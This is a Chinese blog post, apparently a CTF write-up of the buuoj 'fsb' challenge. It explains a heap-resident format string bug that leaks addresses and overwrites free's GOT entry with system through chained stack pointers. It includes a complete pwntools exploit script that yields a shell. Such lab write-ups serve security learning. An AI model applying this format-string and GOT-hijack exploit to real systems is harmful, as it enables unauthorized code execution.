buuoj [第六章 CTF之PWN章]fsb

最新推荐文章于 2023-03-25 14:38:19 发布
最新推荐文章于 2023-03-25 14:38:19 发布
阅读量1.7k 收藏 1
点赞数 2
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/113381578
版权

非栈上的格式化字符串漏洞 + 劫持GOT表

瞅瞅检查

在这里插入图片描述
开了NX、canary跟PIE。

RELRO没有开,可以考虑劫持GOT表。

在这里插入图片描述
进去是个循环

在这里插入图片描述
里面是个格式化字符串漏洞。

因为它开的空间是堆上的,所以常规栈上的格式化字符串漏洞不能用。

在这里插入图片描述
非栈上的格式化字符串漏洞

非栈上的格式化字符串漏洞的话,先在printf处下断点。
在这里插入图片描述
总体思路
满足利用要求的三个指针分别在printf第10、16、20个参数的位置。该程序在循环执行20次输入、输出前申请了一个内存块,用于存放输入的字符串,循环结束后会释放掉这个内存然后退出程序。我们将0x7ffffffee080处的值修改为GOT表中free函数的地址,再将其中的函数指针改为system函数的地址,这样在执行free函数时,实际执行的就是system,只要输入‘/bin/sh’就可以拿到shell。

具体实现
先泄露栈地址,ELF程序地址,libc地址,分别在栈上找到偏移,然后泄露出来。

因为我们输入的东西在堆上,所以不能通过常规的写入GOT表地址然后劫持,只能先把地址写在栈上,然后劫持。
在栈上写地址的时候又要注意,不能直接写,因为要写的地址是一个大数字,不能一下写进去,printf的缓冲区开不了那么大,所以只能一个字节一个字节写。
假设我们现在能控制栈里面的三个地方,分别是p1,p2,p3,p1里面放着p2,p2里面放着p3,p3里面放着一个我们要替换的地址,我们需要讲p3中的地址覆盖成free_got,那么我们需要通过p2写,但是需要一个字节一个字节写,所以需要修改p2,那么就需要p1来修改p2,从而达到一个链。
往free_got中写system一个道理,链q1是p2,q2对应p3,free_got对应p3。

from pwn import *

p=process('./fsb2')
libc = ELF('./libc-2.27.so')
elf = ELF('./fsb2')

p.recvuntil('name:')
p.sendline('%10$p%11$p%21$p')

p.recvuntil('0x')
stack_addr = int(p.recvuntil('0x')[:-2],16)
addr1 = int(p.recvuntil('0x')[:-2],16)
base = addr1 - elf.symbols['vuln']-0x3f
addr2 = int(p.recvuntil('\n')[:-1],16)
libc_base = addr2 - libc.symbols['__libc_start_main']-0xe7

p1 = stack_addr-48
p2 = stack_addr
p3 = stack_addr+32

free_got = base + elf.got['free']
system = libc_base + libc.symbols['system']

#overwrite p3 to free_got
for i in range(0,6):
	x = 5-i
	off = (p3+x)&0xff
	p.recvuntil('name')
	p.sendline("%"+str(off)+"c%10$hhn"+'\x00'*50)

	ch = (free_got>>(x*8))&0xff
	p.recvuntil('name')
	p.sendline("%"+str(ch)+"c%16$hhn"+'\x00'*50)

#overwrite free_got to system
for i in range(0,6):
	off = (free_got+i)&0xff
	p.recvuntil('name')
	p.sendline("%"+str(off)+"c%16$hhn"+'\x00'*50)

	ch = (system>>(i*8))&0xff
	p.recvuntil('name')
	p.sendline("%"+str(ch)+"c%20$hhn"+'\x00'*50)

for i in range(30-25):
	p.recvuntil('name')
	p.sendline('/bin/sh'+'\x00'*100)

p.interactive()
yongbaoii
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
buuoj [第六章 CTFPWN]ROP
yongbaoii的博客
01-28 984
ret2libc 保护。 啥没有。 直接就溢出了,但是没后门函数,就通过puts函数泄露puts函数地址,计算libc基地址,找到system函数与’/bin/sh’, 然后一把梭就好。 需要用到gadget。 exp
BUUCTF PWN 刷题 1-15题
农夫果园好好喝的博客
08-21 2047
经典栈溢出漏洞。
CTF buuoj pwn-----第9题:jarvisoj_level2
bing_Max的博客
09-27 751
1. checksec bing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2 [*] '/home/bing/pwn/jarvisoj_level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) .
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1662
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
BUUCTF PWN-----第1题:test_your_nc
热门推荐
bing_Max的博客
08-27 1万+
buuoj-----第四题:ciscn_2019_n_1 前言 简单记录一下pwn的过程 首先checkesc ,检测文件的保护机制. 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
CTF PWN 武器库题
12-12
在网络安全领域,CTF(Capture The Flag)是一种流行的竞赛形式,其中PWNPwn All The Things)类别涉及的是程序漏洞利用技术。"CTF PWN 武器库题"通常指的是这类竞赛中的一个问题,挑战者需要利用编程技巧来解决...
CTF PWN专用虚拟机-附件资源
03-05
CTF PWN专用虚拟机-附件资源
CTF buuoj pwn-----第7题:ciscn_2019_c_1
bing_Max的博客
09-23 616
CTF buuoj pwn-----第7题:ciscn_2019_c_1前言1.checksec2. IDA 静态分析3. 解题思路4. 编写EXP5. 运行EXP, 获取flag后记 前言 重新梳理记录一下这道题的解题过程. 1.checksec 还是先看一下保护: bing@bing-virtual-machine:~/pwn$ checksec ./ciscn_2019_c_1 [*] '/home/bing/pwn/ciscn_2019_c_1' Arch: amd64-64-li
[BUUCTF-pwn] pwnable_fsb
weixin_52640415的博客
02-05 774
首先是一个小坑,坑人的坑。题目给的32位no PIE的程序与远程上的不同,远程是64位开PIE。 程序先作了一个抬栈,然后可以输入4次printf,再输入key相同则给出shell (远程有原码,很容易看) #include <stdio.h> #include <alloca.h> #include <fcntl.h> unsigned long long key; char buf[100]; char buf2[100]; int fsb(char** a
通过给的libc泄露函数地址
zszcr的博客
03-22 5469
libc中的函数相对于libc的基地址的偏移都是确定的,如果有一道题给你了libc的文件,就可以通过libc文件泄露出system函数和binsh的地址,然后再构造payload。一般通过write()函数泄露 ,通过ELF获得write函数在got表和plt表中的地址同时获得程序start地址 构造payload payload 一般是填充字符(栈的大小)+ ‘aaaa’(覆盖EBP)+  p3...
CTF泄漏libc基址的方法
liucc09的博客
01-05 3947
泄漏libc 重点: glibc 的后三位是固定的 main_arena泄漏法 main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc的基址,使用IDA打开libc文件,然后搜索函数malloc_trim() [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a8DgTYcd-1609837106507)(D:\04_笔记\images\main_arena.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接
非栈上的格式化字符串漏洞利用
qq_52877079的博客
03-25 342
对于常规的栈上格式化字符串漏洞,可以直接构造(%c %n 指针)的方式来实现任意地址写,但是对于非栈上变量来说,就无法直接给出目的地址的指针,因为printf的参数保存在寄存器和栈上面。对于非栈上变量,格式化字符串漏洞依然存在,可以考虑借助已有的栈上指针来实现间接地利用。
[阅读型]CTF中linux pwn的四大基本防御措施
easy_level1的博客
04-13 1457
讨论linux pwn中对二进制文件常见的四个基本防御措施 RELRO NX CANARY PIE
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 656
pwn 64位 泄露libc版本
BUUOJ[MRCTF2020]Transform
阿東啊、
12-04 661
[MRCTF2020]Transform
泄露libc库、shellcode、__libc_csu_init
RKAnjia的博客
12-21 730
level4、第四届蓝帽杯pwn-slient泄露libcwrite函数输出地址puts函数输出地址puts函数输出完地址后没有其他输出puts函数输出完地址后还有其他输出注意shellcode如何写入shellcode?如何使得shellcode执行?_libc_csu_init 泄露libc (有很多是摘自link) write函数输出地址 当题目程序中的输出函数是write函数时,我们就可以利用write函数把write函数的真实地址输出出来。 下面给出write函数的DynELF写法模板(64位):
ctf 简单pwn题资源
最新发布
08-09
CTF 简单 PWN 题资源是指为了让参与网络攻防竞赛的选手提高他们在 PWN 领域的技能而准备的一些简单题目。这些题目通常要求选手对二进制代码进行逆向工程、利用漏洞并实施攻击,以获取题目提供的关键信息或获取系统控制权。 CTF 简单 PWN 题目的资源可以在各种在线平台上找到,例如 CTF 竞赛中常用的CTFd、pwnable.kr 和 picoCTF 等。这些平台提供了大量不同难度的 PWN 题目,从初学者到专业选手都能找到适合自己水平的题目。 此外,还有一些开源项目和教程可以帮助学习简单 PWN 题目的解决方法。例如,pwntools 是一个功能强大的 Python 库,提供了一系列与二进制漏洞利用相关的工具和函数。还有一些博客和视频教程,介绍了从入门级到高级级别的 PWN 解题技巧和常见漏洞的利用方式。 总结来说,CTF 简单 PWN 题目资源是指为了提高参赛者在 PWN 领域的技能而准备的一些简单的二进制漏洞利用题目。这些资源可以通过在线平台、开源项目和教程找到,对于想要在 CTF 竞赛中取得好成绩或提高网络安全技能的人们来说都是非常有价值的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值